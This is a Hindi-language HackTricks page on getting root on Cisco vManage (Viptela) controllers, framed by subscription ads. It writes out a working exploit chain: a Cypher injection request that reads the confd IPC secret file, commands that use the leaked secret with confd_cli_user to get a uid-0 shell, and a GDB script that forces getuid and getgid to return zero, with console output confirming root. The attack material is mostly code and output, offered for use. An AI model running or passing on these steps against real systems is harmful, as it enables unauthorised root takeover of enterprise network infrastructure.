क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आप PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं? सब्सक्रिप्शन प्लान्स देखें!
थोड़ी खोज के बाद कुछ दस्तावेज़ से जुड़े confd और विभिन्न बाइनरी (सिस्को वेबसाइट पर खाता होने पर पहुंचने योग्य) के माध्यम से हमने पाया कि IPC सॉकेट को प्रमाणित करने के लिए, यह /etc/confd/confd_ipc_secret में स्थित एक गुप्त उपयोग करता है:
vmanage:~$ ls -al /etc/confd/confd_ipc_secret
-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
याद है हमारा Neo4j इंस्टेंस? यह vmanage उपयोगकर्ता की अनुमतियों के तहत चल रहा है, इसलिए हमें पिछली कमजोरी का उपयोग करके फ़ाइल प्राप्त करने की अनुमति है:
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
Host: vmanage-XXXXXX.viptela.net
[...]
"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
`confd_cli` प्रोग्राम कमांड लाइन आर्ग्यूमेंट का समर्थन नहीं करता है लेकिन `/usr/bin/confd_cli_user` को आर्ग्यूमेंट के साथ बुलाता है। इसलिए, हम अपने खुद के सेट ऑफ आर्ग्यूमेंट के साथ सीधे `/usr/bin/confd_cli_user` को बुला सकते हैं। हालांकि यह हमारी वर्तमान विशेषाधिकारों के साथ पठनीय नहीं है, इसलिए हमें रूटएफएस से इसे पुनः प्राप्त करना होगा और scp का उपयोग करके कॉपी करना होगा, मदद पढ़ना होगा, और इसका उपयोग करके शैल को प्राप्त करना होगा:
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret
vManage:~$ /tmp/confd_cli_user -U 0 -G 0
Welcome to Viptela CLI
admin connected from 127.0.0.1 using console on vManage
vManage# vshell
vManage:~# id
uid=0(root) gid=0(root) groups=0(root)
साइनैक्टिव टीम द्वारा लिखी गई ब्लॉग¹ में एक शानदार तरीका वर्णित किया गया था जिससे रूट शैल मिल सकता है, लेकिन एक सावधानी है कि यह /usr/bin/confd_cli_user की प्रतिलिपि प्राप्त करना आवश्यक है जो केवल रूट द्वारा पढ़ा जा सकता है। मैंने इस तरह से रूट तक उन्नति करने का एक और तरीका खोजा।
जब मैंने /usr/bin/confd_cli बाइनरी को disassemble किया, तो मैंने निम्नलिखित का अवलोकन किया:
मैंने अनुमान लगाया कि "confd_cli" कार्यक्रम उपयोगकर्ता आईडी और समूह आईडी को "cmdptywrapper" एप्लिकेशन को पास करता है जो उपयोगकर्ता से एकत्रित किया गया था।
मेरा पहला प्रयास "cmdptywrapper" को सीधे चलाना और इसे -g 0 -u 0 के साथ प्रदान करना था, लेकिन यह विफल हुआ। ऐसा लगता है कि किसी जगह एक फ़ाइल डिस्क्रिप्टर (-i 1015) बनाया गया था और मैं इसे फर्जी नहीं कर सकता।
Synacktiv के ब्लॉग (अंतिम उदाहरण में) में उल्लिखित तरह, confd_cli कार्यक्रम कमांड लाइन तर्क का समर्थन नहीं करता है, लेकिन मैं इसे डीबगर के साथ प्रभावित कर सकता हूँ और भाग्य से GDB सिस्टम पर शामिल है।
मैंने एक GDB स्क्रिप्ट बनाया जहाँ मैंने API getuid और getgid को 0 लौटाने के लिए बाध्य किया। क्योंकि मेरे पास पहले से ही "vmanage" विशेषाधिकार हैं जिसके माध्यम से मैं सीधे /etc/confd/confd_ipc_secret को पढ़ने की अनुमति है।
root.gdb:
set environment USER=root
define root
finish
set $rax=0
continue
end
break getuid
commands
root
end
break getgid
commands
root
end
run
कंसोल आउटपुट:
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-poky-linux".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
Breakpoint 1 at 0x400f40
Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401871 in ?? ()
Welcome to Viptela CLI
root connected from 127.0.0.1 using console on vmanage
vmanage# vshell
bash-4.4# whoami ; id
root
uid=0(root) gid=0(root) groups=0(root)
bash-4.4#
क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आप PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं? सब्सक्रिप्शन प्लान्स की जाँच करें!